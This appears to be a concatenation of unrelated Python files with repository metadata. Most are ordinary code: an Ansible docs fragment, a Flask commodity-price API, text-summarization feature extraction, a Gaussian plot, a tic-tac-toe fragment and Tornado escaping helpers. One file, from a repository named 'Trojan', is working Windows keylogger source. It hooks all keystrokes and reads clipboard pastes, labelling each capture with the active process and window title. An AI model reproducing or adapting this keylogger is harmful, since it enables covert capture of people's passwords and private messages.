    """Fetch the career profile of every account on its own worker thread.

    First shows a small "Getting accounts..." progress animation, then
    spawns one thread per account and blocks until all of them finish.
    """
    for tick in range(len(accounts)):
        print("Getting accounts%s" % ("." * tick), end="\r")
        time.sleep(1.5)
    workers = []
    for account in accounts:
        worker = Thread(target=get_career_profile, args=[account])
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()
# Script entry point: load the config, fetch the accounts and their stats
# once, then loop forever showing the table and prompting for an action.
if __name__ == "__main__":
    config = load_config()           # module global: read by the table printer
    accounts = get_accounts(config)  # module global: read by print_*/prompt_* helpers
    update_account_stats(accounts)
    while True:
        print_account_table()
        print('')
        print_legend()
        print('')
        print_stats()
        time.sleep(0.5)  # brief pause before re-prompting
        prompt_action()
| [
"nate.shoffner@gmail.com"
] | nate.shoffner@gmail.com |
758d3add23ff4cc75c3f3557a759800c70585c20 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /plugins/doc_fragments/files.py | a3723db249284fc0990a043729d80d3b2ea6bec2 | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | # -*- coding: utf-8 -*-
# Copyright: (c) 2014, Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
    """Reusable Ansible documentation fragment for the standard file options.

    Provides the shared documentation for permissions/ownership, SELinux
    context, unsafe writes, and filesystem attributes that file-handling
    modules inject via ``extends_documentation_fragment: files``.
    """

    # Standard files documentation fragment

    # Note: mode is overridden by the copy and template modules so if you change the description
    # here, you should also change it there.
    DOCUMENTATION = r'''
options:
  mode:
    description:
    - The permissions the resulting file or directory should have.
    - For those used to I(/usr/bin/chmod) remember that modes are actually octal numbers.
      You must either add a leading zero so that Ansible's YAML parser knows it is an octal number
      (like C(0644) or C(01777)) or quote it (like C('644') or C('1777')) so Ansible receives
      a string and can do its own conversion from string into number.
    - Giving Ansible a number without following one of these rules will end up with a decimal
      number which will have unexpected results.
    - As of Ansible 1.8, the mode may be specified as a symbolic mode (for example, C(u+rwx) or
      C(u=rw,g=r,o=r)).
    - As of Ansible 2.6, the mode may also be the special string C(preserve).
    - When set to C(preserve) the file will be given the same permissions as the source file.
    type: str
  owner:
    description:
    - Name of the user that should own the file/directory, as would be fed to I(chown).
    type: str
  group:
    description:
    - Name of the group that should own the file/directory, as would be fed to I(chown).
    type: str
  seuser:
    description:
    - The user part of the SELinux file context.
    - By default it uses the C(system) policy, where applicable.
    - When set to C(_default), it will use the C(user) portion of the policy if available.
    type: str
  serole:
    description:
    - The role part of the SELinux file context.
    - When set to C(_default), it will use the C(role) portion of the policy if available.
    type: str
  setype:
    description:
    - The type part of the SELinux file context.
    - When set to C(_default), it will use the C(type) portion of the policy if available.
    type: str
  selevel:
    description:
    - The level part of the SELinux file context.
    - This is the MLS/MCS attribute, sometimes known as the C(range).
    - When set to C(_default), it will use the C(level) portion of the policy if available.
    type: str
    default: s0
  unsafe_writes:
    description:
    - Influence when to use atomic operation to prevent data corruption or inconsistent reads from the target file.
    - By default this module uses atomic operations to prevent data corruption or inconsistent reads from the target files,
      but sometimes systems are configured or just broken in ways that prevent this. One example is docker mounted files,
      which cannot be updated atomically from inside the container and can only be written in an unsafe manner.
    - This option allows Ansible to fall back to unsafe methods of updating files when atomic operations fail
      (however, it doesn't force Ansible to perform unsafe writes).
    - IMPORTANT! Unsafe writes are subject to race conditions and can lead to data corruption.
    type: bool
    default: no
  attributes:
    description:
    - The attributes the resulting file or directory should have.
    - To get supported flags look at the man page for I(chattr) on the target system.
    - This string should contain the attributes in the same order as the one displayed by I(lsattr).
    - The C(=) operator is assumed as default, otherwise C(+) or C(-) operators need to be included in the string.
    type: str
    aliases: [ attr ]
'''
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
e843f2f5fde9959a0c9ca2b6065b89fa98b9c9d5 | 2bb83c3cb44e68be897f3a9aec78915f28b8eab3 | /web_service.py | def5cd076a22f733406b388f8d5239615832a583 | [] | no_license | emilianomfortes/Investing.com-Scraper | 3f45fa003e58bc45652533234691fd6a37cec43e | 890d75bcfd6fbe8b74eb8545461f95cb57354cb4 | refs/heads/master | 2023-03-15T21:53:25.016289 | 2019-06-09T07:37:47 | 2019-06-09T07:37:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,135 | py | from flask import Flask
from flask import request
from flask import jsonify, make_response
import numpy as np
from datetime import datetime, timezone
from db_table import db_table
# Single Flask application instance; the /commodity route below registers on it.
app = Flask(__name__)
# Set up db connection
def get_db_conn():
    """Return a db_table handle for the commodity price table.

    Schema: a Date primary key plus one float price column per metal.
    """
    schema = {
        "Date": "date PRIMARY KEY",
        "Gold": "float",
        "Silver": "float",
    }
    return db_table("Prices", schema)
@app.route('/commodity', methods=["GET"])
def compute_commodity():
    """Return daily prices plus mean/variance for one commodity.

    Query parameters:
        start_date, end_date -- "YYYY-MM-DD", interpreted as UTC
        commodity_type       -- "gold" or "silver" (case-insensitive)

    Responds 400 on any missing/invalid parameter, otherwise 200 with
    {"data": {date: price}, "mean": ..., "variance": ...}.
    """
    db = get_db_conn()
    # Validate that all three required query-string arguments are present.
    if not request.args.get("start_date"):
        return make_response(jsonify({"message": "Invalid start date"}), 400)
    if not request.args.get("end_date"):
        return make_response(jsonify({"message": "Invalid end date"}), 400)
    if not request.args.get("commodity_type"):
        return make_response(jsonify({"message": "Invalid commodity type"}), 400)
    start = request.args.get("start_date")
    end = request.args.get("end_date")
    commodity_type = request.args.get("commodity_type")
    # Convert the ISO dates to UTC Unix timestamps, which is how rows are keyed.
    start = datetime.strptime(start, "%Y-%m-%d").replace(tzinfo=timezone.utc).timestamp()
    end = datetime.strptime(end, "%Y-%m-%d").replace(tzinfo=timezone.utc).timestamp()
    if commodity_type.lower() != "gold" and commodity_type.lower() != "silver":
        return make_response(jsonify({"message": "Commodity type gold or silver only"}), 400)
    results = db.select_prices_between_dates(start, end, commodity_type)
    data = {}
    prices = []
    for result in results:
        date = str(datetime.utcfromtimestamp(result[0]))
        price = result[1] or -1  # rows with a NULL price become the -1 sentinel
        # BUG FIX: the original used "price is -1", an identity comparison that
        # only happens to work for CPython's cached small ints and raises a
        # SyntaxWarning on Python >= 3.8; use equality to skip missing prices.
        if price == -1:
            continue
        data[date[:-9]] = price  # strip the " HH:MM:SS" suffix, keep YYYY-MM-DD
        prices.append(price)
    mean = np.mean(prices).astype(float)
    variance = np.var(prices).astype(float)
    return_data = {
        "data": data,
        "mean": round(mean, 2),  # example given, the data was rounded to the closest 2 decimal places
        "variance": round(variance, 2)
    }
    return make_response(jsonify(return_data), 200)
| [
"thomas.pham96@yahoo.com"
] | thomas.pham96@yahoo.com |
57fab0e19bb4bd272a0f164b668604ea96c0d46e | d20566ab9a909c36559568dc49e77e76d75ab62b | /ams/structures/sim_taxi_user.py | 41cd8b1dcf1ea1107ad18109fac8162320a52e15 | [
"Apache-2.0"
] | permissive | yangkang411/AMS | 3049712afd37bf7463adfa25e8f01ffbe226ba54 | bb685024b1c061e7144dc2ef93e09d6d6c830af8 | refs/heads/master | 2022-01-05T15:56:05.063164 | 2018-04-13T06:28:24 | 2018-04-13T06:28:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 654 | py | #!/usr/bin/env python
# coding: utf-8
from ams.structures import get_namedtuple_from_dict
# Immutable constant namespace describing the simulated taxi user node:
# its node name, the FSM triggers (events) that drive it, and the states
# it can be in during a ride.
SIM_TAXI_USER = get_namedtuple_from_dict("CONST", {
    "NODE_NAME": "SimTaxiUser",
    # Events fired against the user's state machine.
    "TRIGGER": {
        "REQUEST": "request",
        "WAIT": "wait",
        "GET_ON": "get_on",
        "GOT_ON": "got_on",
        "MOVE_VEHICLE": "move_vehicle",
        "GET_OUT": "get_out",
        "GOT_OUT": "got_out"
    },
    # States the user passes through from calling a taxi to leaving it.
    "STATE": {
        "CALLING": "calling",
        "WAITING": "waiting",
        "GETTING_ON": "getting_on",
        "GOT_ON": "got_on",
        "MOVING": "moving",
        "GETTING_OUT": "getting_out",
        "GOT_OUT": "got_out"
    },
})
| [
"hiro-ya-iv@gmail.com"
] | hiro-ya-iv@gmail.com |
078c7897397892d20957b1746bb3eda834acdc22 | ca234628f41b010cb9ef51d46a612172f5810f5c | /Codes/NN/feature_extraction.py | 957041a02974da108859464e931afc11c57509fd | [] | no_license | AdityaGolatkar/Document-Summarization-by-key-sentence-extraction-using-NN | 88f064466d847936c957a2fddfd44d637fb7c717 | 8a7c37b289cec117f273abc438d8b51f2e97592d | refs/heads/master | 2020-03-26T15:59:51.766083 | 2018-10-10T04:09:05 | 2018-10-10T04:09:05 | 145,076,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,113 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 23 16:55:33 2017
@author: Rudrajit Aditya Akash
"""
import csv
import nltk
#nltk.download('punkt')
import re
import glob
import numpy as np
from gensim.models import Word2Vec
from sklearn.metrics.pairwise import cosine_similarity
#import pdb
#model = KeyedVectors.load_word2vec_format('/home/audy/GoogleNews-vectors-negative300.bin', binary=True)
from sklearn.decomposition import TruncatedSVD
def compute_pc(X, npc=1):
    """
    Compute the principal components. DO NOT MAKE THE DATA ZERO MEAN!
    :param X: X[i,:] is a data point
    :param npc: number of principal components to remove
    :return: component_[i,:] is the i-th pc
    """
    # TruncatedSVD.fit returns the estimator itself, so the call can be chained.
    return TruncatedSVD(n_components=npc, n_iter=7,
                        random_state=1).fit(X).components_
def remove_pc(X, npc=1):
    """
    Remove the projection on the principal components
    :param X: X[i,:] is a data point
    :param npc: number of principal components to remove
    :return: XX[i, :] is the data point after removing its projection
    """
    pc = compute_pc(X, npc)
    if npc == 1:
        projection = X.dot(pc.transpose()) * pc
    else:
        projection = X.dot(pc.transpose()).dot(pc)
    return X - projection
def get_sentences(file_name):
    """Split the contents of *file_name* into a list of sentences.

    Uses NLTK's pre-trained English Punkt sentence tokenizer.
    """
    tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')
    # Context manager ensures the handle is closed (the original leaked it).
    with open(file_name) as fp:
        text = fp.read()
    return tokenizer.tokenize(text)
def get_words(sentence):
    """Return the word tokens of *sentence* (non-word characters act as separators)."""
    cleaned = re.sub(r"[^\w]", " ", sentence)
    return cleaned.split()
def get_total_word_count():
    """Sum the counts in git_prob.txt (one "word count" pair per line).

    Returns the corpus-wide total N used to turn raw counts into
    probabilities in get_one_word_prob().
    """
    total = 0
    # Context manager replaces the original's manual open/close pairing.
    with open('git_prob.txt', 'r') as f:
        for line in f:
            line = line.strip().lower()
            if not line:
                continue  # robustness: skip blank lines (the original raised)
            # Everything after the first space is the count for that word.
            total += int(line[line.index(' ') + 1:])
    return total
def get_one_word_prob(word_ex, N):
    """Return the unigram probability count/N of *word_ex* from git_prob.txt.

    The lookup is case-insensitive; the first matching line wins.  If the
    word is not listed, 0 is returned.
    """
    target = word_ex.lower()
    # Context manager replaces manual open/close; split() replaces the
    # original's fragile fixed-offset character-index parsing.
    with open('git_prob.txt', 'r') as f:
        for line in f:
            line = line.strip().lower()
            if ' ' not in line:
                continue  # malformed or blank line - cannot hold a pair
            word, count = line.split(' ', 1)
            if word == target:
                return int(count) / N
    # the word was not found in the list
    return 0
def get_word_prob(words, N):
    """Return a float array with the unigram probability of each word in *words*."""
    return np.asarray([get_one_word_prob(word, N) for word in words],
                      dtype=float)
def prob_and_vec(words, model, N):
    """Look up a 300-d embedding and a unigram probability for every word.

    Words missing from *model* are retried capitalized, then upper-cased,
    and fall back to a zero vector if still unknown.

    Returns (word_vec, word_prob): a (300, len(words)) matrix of column
    vectors and the matching probability array.
    """
    dim = 300
    word_prob = get_word_prob(words, N)
    word_vec = np.zeros((dim, len(words)))
    for idx, word in enumerate(words):
        for candidate in (word, word.capitalize(), word.upper()):
            try:
                word_vec[:, idx] = model[candidate]
                break
            except Exception:
                continue
        # If every lookup failed the column simply keeps its zero initialisation.
    return word_vec, word_prob
def get_sentence_embeddings(file_name, model, N):
    """Compute a (300, n_sentences) embedding matrix for *file_name*.

    Each sentence vector is the weighted average of its word vectors with
    weight a/(a + p(word)) - this appears to follow the SIF weighting
    scheme - after which the first principal component common to all
    sentences is removed via remove_pc().
    """
    sentences = get_sentences(file_name)
    dim = 300
    a = 2.5e-3  # smoothing parameter for the probability weighting
    embeddings = np.zeros((dim, len(sentences)))
    for idx, sentence in enumerate(sentences):
        words = get_words(sentence)
        word_vecs, word_probs = prob_and_vec(words, model, N)
        weights = np.divide(a, a + word_probs)
        if len(words) != 0:
            embeddings[:, idx] = np.dot(word_vecs, weights) / len(words)
    # remove_pc works on row-vectors, hence the transposes around the call.
    cleaned = remove_pc(embeddings.T, 1)
    return cleaned.T
def get_text_and_summary():
    # Load the news_summary.csv dataset: row[5] holds the full article text,
    # row[4] the human-written summary.  Returns two parallel lists.
    news = csv.reader(open('news_summary.csv',encoding="ISO-8859-1"), delimiter=',')
    #news = csv.reader(open('news_summary.csv'), delimiter=',')
    N = 4515  # expected number of data rows in the CSV (hard-coded)
    text = [[] for i in range(N)]
    text_summ = [[] for i in range(N)]
    i = 0
    b = 0  # flag: 0 only for the header row, which is skipped
    for row in news:
        if b == 0:
            b = 1
            continue
        else:
            # To correct most of the bullshit in the actual text
            t = str(row[5])
            lt = len(t)
            # In-place clean-up: insert a space after any '.' not already
            # followed by one (t grows) and delete '?' characters (t shrinks).
            # Because t mutates while scanning, the loop re-checks the current
            # length each iteration and bails out early when past the end.
            for j in range(0,lt-1):
                if (j >= len(t)-1):
                    break
                if (t[j] == '.' and t[j+1] != ' '):
                    t1 = t[0:j+1]
                    t2 = t[j+1:]
                    t = t1+' '+t2
                if (t[j] == '?'):
                    t1 = t[0:j]
                    t2 = t[j+1:]
                    t = t1+t2
            text[i] = t
            text_summ[i] = str(row[4])
            #text[i] = row[5]
            #text_summ[i] = row[4]
            i = i+1
    return text,text_summ
def get_text_and_summary2():
    """Load (text, summary) pairs from the Summaries/*.txt files.

    Each file is expected to hold three ':'-separated fields: field 1 is the
    summary (minus a 12-character trailer) and field 2 the full text.
    """
    ct = len(glob.glob('Summaries/*.txt'))
    print(ct)
    text = [[] for _ in range(ct)]
    text_summ = [[] for _ in range(ct)]
    for i, filename in enumerate(glob.glob('Summaries/*.txt')):
        # Context manager fixes the original's leak of one open file handle
        # per summary file.
        with open(filename) as fo:
            contents = fo.read()
        fields = contents.split(":")
        text[i] = fields[2]
        text_summ[i] = fields[1][:-12]
    return text, text_summ
def get_key_sentence_labels(sentence_embeddings, sentence_embeddings_summ):
    """Flag, for every document sentence, whether it is the closest match
    (by cosine similarity) to some summary sentence.

    Both arguments are (300, n) matrices of column vectors.  Returns a 0/1
    array with one entry per document sentence.
    """
    n_summ = sentence_embeddings_summ.shape[1]
    n_doc = sentence_embeddings.shape[1]
    labels = np.zeros(n_doc)
    doc_vectors = np.transpose(sentence_embeddings)
    for j in range(n_summ):
        summ_vector = (sentence_embeddings_summ[:, j]).reshape(1, -1)
        similarity = cosine_similarity(summ_vector, doc_vectors)
        labels[np.argmax(similarity)] = 1
    return labels
# Zero padding done to deal with sentences at the beginning and end
def get_input_and_ouptut_vectors(text, text_summ, N1, N2, z, model, no):
    """Build the windowed training matrices for documents N1..N2-1.

    For every sentence, one row of X stacks the embeddings of the sentence
    and its 3 neighbours on each side (zero-padded at document edges); Y
    holds the matching key-sentence label.  The arrays are saved to
    X/Y_{train|test}_122222.npy depending on *z* (1 = train) and returned.
    """
    m = 300                # embedding dimension of the word vectors
    win = 3                # sentences of context on each side
    w = (2 * win + 1) * m  # row width: 7 stacked sentence embeddings
    # X is p x w (p = number of usable sentences); Y starts as p x 2 and is
    # reduced to its first column before saving.
    X = np.zeros([1, w])
    Y = np.zeros([1, 2])
    b = 0  # 0 until the first row has been written in place
    # Document indices whose text/summary rows break the pipeline (malformed
    # dataset entries); originally a long chain of "if i == ...: continue".
    skip = {12, 20, 21, 40, 120, 121, 133, 134, 147, 148, 151, 152,
            154, 155, 161, 162, 167, 168, 169, 170}
    for i in range(N1, N2):
        if i in skip:
            continue
        # Write the document to a scratch file so the file-based sentence
        # tokenizer and embedding helpers can consume it ('w' truncates).
        with open('text.txt', 'w') as file_text:
            file_text.write(text[i])
        sentences = get_sentences('text.txt')
        if len(sentences) == 0:
            continue
        sentence_embeddings = get_sentence_embeddings('text.txt', model, no)
        with open('text_summ.txt', 'w') as file_summ:
            file_summ.write(text_summ[i])
        sentence_embeddings_sum = get_sentence_embeddings('text_summ.txt', model, no)
        # key_sentences[k] is 1 iff sentence k best matches some summary
        # sentence, else 0.
        key_sentences = get_key_sentence_labels(sentence_embeddings, sentence_embeddings_sum)
        # Zero-pad 'win' columns on each side so edge sentences still get a
        # full 7-sentence window.
        padded = np.zeros([m, 2 * win + sentence_embeddings.shape[1]])
        padded[:, win:win + sentence_embeddings.shape[1]] = sentence_embeddings
        sentence_embeddings = padded
        try:
            for j in range(win, len(key_sentences) + win):
                window_row = (np.transpose(sentence_embeddings[:, j - win:j + win + 1])).ravel()
                if b == 0:
                    X[b, :] = window_row
                    Y[b, 0] = key_sentences[j - win]
                    b = 1
                else:
                    X = np.vstack((X, window_row))
                    Y = np.vstack((Y, np.array([key_sentences[j - win], 0])))
        except Exception:  # was a bare except; keep skipping broken documents
            continue
        print(i)
    Y = Y[:, 0]
    if z == 1:
        np.save('X_train_122222.npy', X)
        np.save('Y_train_122222.npy', Y)
    else:
        np.save('X_test_122222.npy', X)
        np.save('Y_test_122222.npy', Y)
    return X, Y
def generate_summary_file(text, key_sentence_labels, N1, N2):
    """Write the sentences flagged in *key_sentence_labels* for documents
    N1..N2-1 of *text* into summary.txt, one blank line between documents."""
    label_index = 0
    with open('summary.txt', 'w') as summary_file:
        for doc in range(N1, N2):
            # Stage the document in the scratch file consumed by get_sentences.
            with open('text.txt', 'w') as scratch:
                scratch.write(text[doc])
            for sentence in get_sentences('text.txt'):
                if label_index < len(key_sentence_labels):
                    if key_sentence_labels[label_index] == 1:
                        summary_file.write(sentence)
                    label_index += 1
            summary_file.write('\n')
            summary_file.write('\n')
def get_input_for_CNN(X):
    """Reshape flat window rows into (samples, 300, 7) channels for a CNN.

    Each row of X holds 7 consecutive 300-d sentence embeddings stacked
    side by side; this splits them back out along the last axis.
    """
    window = 7   # 2*3 + 1 sentences per window
    dim = 300    # embedding dimension
    X_CNN = np.zeros((X.shape[0], dim, window))
    for slot in range(window):
        X_CNN[:, :, slot] = X[:, dim * slot:dim * (slot + 1)]
    return X_CNN
| [
"chelsea.aditya@gmail.com"
] | chelsea.aditya@gmail.com |
f53973cb2c5d59d6ecde1124bde8d394e1012c75 | 508fd0c0bda8bed4a583b6e49a35083710a52e66 | /2d-gaussian.py | 9af9e15f8863355055ead1f6882c3e68dc24d426 | [] | no_license | cagnol/CIP | eced651209d7848337570aa33b0243bd6f36eec8 | 65d394f5b46430c7d5e539ebcf635bb08352fda2 | refs/heads/master | 2020-09-04T14:56:43.726377 | 2019-11-05T16:53:37 | 2019-11-05T16:53:37 | 219,761,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,736 | py | # This program was created by Christian Hill (IAEA)
# Used, with permission, in the CentraleSupelec CIP class - Lab #10
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
# Our 2-dimensional distribution will be over variables X and Y
N = 60  # grid resolution per axis
X = np.linspace(-5, 5, N)
Y = np.linspace(-5, 5, N)
X, Y = np.meshgrid(X, Y)
# Mean vector and covariance matrix (standard bivariate normal)
mu = np.array([0, 0])
Sigma = np.array([[1 , 0], [0, 1]])
# Pack X and Y into a single 3-dimensional array of shape (N, N, 2),
# where the last axis holds the (x, y) coordinates of each grid point.
pos = np.empty(X.shape + (2,))
pos[:, :, 0] = X
pos[:, :, 1] = Y
def multivariate_gaussian(pos, mu, Sigma):
    """Return the multivariate Gaussian distribution on array pos.

    pos is an array constructed by packing the meshed arrays of variables
    x_1, x_2, x_3, ..., x_k into its _last_ dimension.
    """
    k = mu.shape[0]
    det = np.linalg.det(Sigma)
    inv = np.linalg.inv(Sigma)
    norm_const = np.sqrt((2 * np.pi) ** k * det)
    diff = pos - mu
    # (x-mu)^T Sigma^{-1} (x-mu), vectorised over all leading dimensions.
    mahalanobis = np.einsum('...k,kl,...l->...', diff, inv, diff)
    return np.exp(-mahalanobis / 2) / norm_const
# The distribution on the variables X, Y packed into pos.
Z = multivariate_gaussian(pos, mu, Sigma)
# Create a surface plot and projected filled contour plot under it.
fig = plt.figure()
# BUG FIX: fig.gca(projection='3d') was deprecated in Matplotlib 3.4 and
# removed in 3.6; add_subplot(projection='3d') is the supported spelling
# and also works on older versions.
ax = fig.add_subplot(projection='3d')
ax.plot_surface(X, Y, Z, rstride=3, cstride=3, linewidth=1, antialiased=True,
                cmap=cm.viridis)
cset = ax.contourf(X, Y, Z, zdir='z', offset=-0.15, cmap=cm.viridis)
# Adjust the limits, ticks and view angle
ax.set_zlim(-0.15, 0.2)
ax.set_zticks(np.linspace(0, 0.2, 5))
ax.view_init(27, -21)
plt.show()
| [
"noreply@github.com"
] | cagnol.noreply@github.com |
f3c92b2e8985689e0247cfdac48bad241ea68cfa | 4437b255b48afbc75a35bc99b1c5a90cc779ceeb | /modules/keylogger.py | 66a2dfd98d49c32d267126b023b3473cd44f0ab4 | [] | no_license | Mahiuha/Trojan | 2efd536bda06afdea1d94e02e6a25cfb74a1f6bc | bcb61d9c8ad7ceb0a12d40ad23796cbb9165623a | refs/heads/master | 2023-06-11T02:19:34.947055 | 2021-07-01T01:25:06 | 2021-07-01T01:25:06 | 260,301,764 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,978 | py | from ctypes import *
import pythoncom
import pyHook
import win32clipboard
# Handles to the Win32 DLLs used throughout this script.
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi

# Title of the window that last received a keystroke; lets KeyStroke detect
# focus changes and re-print the process header.
current_window = None
def get_current_process():
    # Print a "[ PID: n - exe - window title ]" header for whichever window
    # currently has keyboard focus (Python 2 - note the bare print statements).
    # get a handle to the foreground window
    hwnd = user32.GetForegroundWindow()
    # find the process ID
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))
    # store the current process ID
    process_id = "%d" % pid.value
    # grab the executable name of the owning process
    executable = create_string_buffer("\x00" * 512)
    # 0x400 | 0x10 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
    psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
    # now read its title
    window_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(window_title),512)
    # print out the header if we're in the right process
    print
    print ("[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value))
    print
    # close handles
    # NOTE(review): passing an HWND to CloseHandle looks wrong - window handles
    # are not kernel object handles; only h_process should need closing.
    # Confirm on Windows before changing.
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)
def KeyStroke(event):
    # pyHook KeyDown callback (Python 2 style): logs printable characters,
    # expands "V" presses into the clipboard contents, and names other keys.
    global current_window
    # check to see if target changed windows
    if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()
    # if they pressed a standard printable key (ASCII 33..126)
    if event.Ascii > 32 and event.Ascii < 127:
        print (chr(event.Ascii),)
    else:
        # if [Ctrl-V], get the value on the clipboard
        # NOTE(review): this fires on any "V" keypress - the Ctrl modifier
        # state is never checked here.
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print ("[PASTE] - %s" % (pasted_value),)
        else:
            print ("[%s]" % event.Key,)
    # pass execution to next hook registered
    return True
# create and register a hook manager, wiring our callback to key-down events
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
# register the hook and execute forever
kl.HookKeyboard()
pythoncom.PumpMessages()  # blocks forever, dispatching Windows messages to the hook
| [
"tiasho.mahiuha@gmail.com"
] | tiasho.mahiuha@gmail.com |
6bd87fef952e8c69e3423f386f408538339d9185 | 8370083dbbbd32740ad1862637809396dc7984e2 | /paresh61.A.MILESTONEPROJECTE/a1.py | 524064c675bcdabbfbdd144f009ea8b4126de4dc | [] | no_license | parshuramsail/PYTHON_LEARN | a919b14aab823e0f5e769d8936ddbfb357133db2 | 8c76720bf73f13cf96930e6d4d5128e6ba9aa535 | refs/heads/main | 2023-07-14T16:25:26.240555 | 2021-08-29T17:10:19 | 2021-08-29T17:10:19 | 401,095,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | # STEP1: write a function that can printout a board.setup your board as your list,where each index 1-9 corresponnds with a number on a numberpad.
#so you can get a 3 by 3 board representation.
#print('\n'*100)
def display_board(board):
    """Print the tic-tac-toe board; cells 1-9 follow the numpad layout
    (7-8-9 on top, 1-2-3 on the bottom)."""
    print('\n'*100)  # push the previous board off-screen ("clear")
    for left, middle, right in ((7, 8, 9), (4, 5, 6), (1, 2, 3)):
        print(" | |")
        print(" " + board[left] + ' | ' + board[middle] + ' | ' + board[right])
        print(" | |")
        if (left, middle, right) != (1, 2, 3):  # no rule after the last row
            print("--------------------")
# TEST STEP1:RUN YOUR FUNCTION ON TEST VERSION OF THE BOARD LIST AND MAKE ADJUSTMENTS AS NECESSARY.
# Index 0 is a placeholder ('#') so cells 1-9 line up with the numpad keys.
test_board=["#","X","O","X","O","X","O","X","O","X"]
#test_board=['']*10
display_board(test_board)
#print(display_board(test_board))
# STEP3:
def player_input():
    """
    output:(player1=marker, player2=marker)
    """
    marker = ""
    # keep asking player 1 to choose X or O
    while marker not in ("X", "O"):
        marker = input("player:1 choose X or O: ").upper()
    # Player 2 automatically receives the marker player 1 did not pick.
    return ("X", "O") if marker == "X" else ("O", "X")
# RUN THE FUNCTION TO MAKE SURE IT RUNS THE DESIRED OUTPUT
# NOTE: this prompts the user interactively when the script is run.
player1_marker,player2_marker=player_input()
# STEP3
def place_marker(board, marker, position):
    """Write *marker* into cell *position* of *board* (mutates the list)."""
    board[position] = marker
# Quick smoke test: drop a '$' into cell 8 and redraw the board.
test_board=["#","X","O","X","O","X","O","X","O","X"]
place_marker(test_board,"$",8)
display_board(test_board)
# STEP 4: WRITE IN A FUNCTION THAT TAKES IN A BOARD AND MARK (X OR O) AND CHECKS TO SEE IF THAT MARK HAS WON.
def win_check(board, mark):
    """Return True if *mark* occupies any complete row, column, or diagonal."""
    winning_lines = (
        (7, 8, 9), (4, 5, 6), (1, 2, 3),   # rows
        (7, 4, 1), (8, 5, 2), (9, 6, 3),   # columns
        (7, 5, 3), (9, 5, 1),              # diagonals
    )
    return any(all(board[cell] == mark for cell in line)
               for line in winning_lines)
| [
"64275709+parshuramsail@users.noreply.github.com"
] | 64275709+parshuramsail@users.noreply.github.com |
5bee45a0cbd221f62d0be3707a689e7652ead36e | 76df81aeec45e58b9e013314ca458b8f00eb9d78 | /lib/escape.py | 5b40d37d5113f0e4fb1b85ac5ef88b9db56e86c3 | [] | no_license | tuang/KindWave | 9bc180b45eb55b7b5055ba2fcf06fd3ecaf47622 | ffbf988685fc8577c969a3f9717e564ee13b845f | refs/heads/master | 2016-09-06T02:49:01.173437 | 2014-11-19T07:13:33 | 2014-11-19T07:13:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,413 | py | #!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Escaping/unescaping methods for HTML, JSON, URLs, and others."""
import htmlentitydefs
import re
import xml.sax.saxutils
import urllib
# json module is in the standard library as of python 2.6; fall back to
# simplejson if present for older versions.
# Resolution order: stdlib json -> simplejson -> Django's bundled simplejson
# (for Google App Engine).  If none is importable, _json_decode/_json_encode
# become a stub that raises NotImplementedError on first use.
try:
    import json
    assert hasattr(json, "loads") and hasattr(json, "dumps")
    _json_decode = json.loads
    _json_encode = json.dumps
except:
    try:
        import simplejson
        _json_decode = lambda s: simplejson.loads(_unicode(s))
        _json_encode = lambda v: simplejson.dumps(v)
    except ImportError:
        try:
            # For Google AppEngine
            from django.utils import simplejson
            _json_decode = lambda s: simplejson.loads(_unicode(s))
            _json_encode = lambda v: simplejson.dumps(v)
        except ImportError:
            def _json_decode(s):
                raise NotImplementedError(
                    "A JSON parser is required, e.g., simplejson at "
                    "http://pypi.python.org/pypi/simplejson/")
            _json_encode = _json_decode
def xhtml_escape(value):
    """Escapes a string so it is valid within XML or XHTML."""
    # saxutils.escape always handles &, <, >; the extra map adds double quotes.
    quote_entities = {'"': "&quot;"}
    return xml.sax.saxutils.escape(value, quote_entities)
def xhtml_unescape(value):
    """Un-escapes an XML-escaped string."""
    text = _unicode(value)
    return re.sub(r"&(#?)(\w+?);", _convert_entity, text)
def json_encode(value):
    """JSON-encodes the given Python object."""
    # JSON permits but does not require forward slashes to be escaped.
    # Escaping "</" keeps JSON embedded in an HTML <script> tag from being
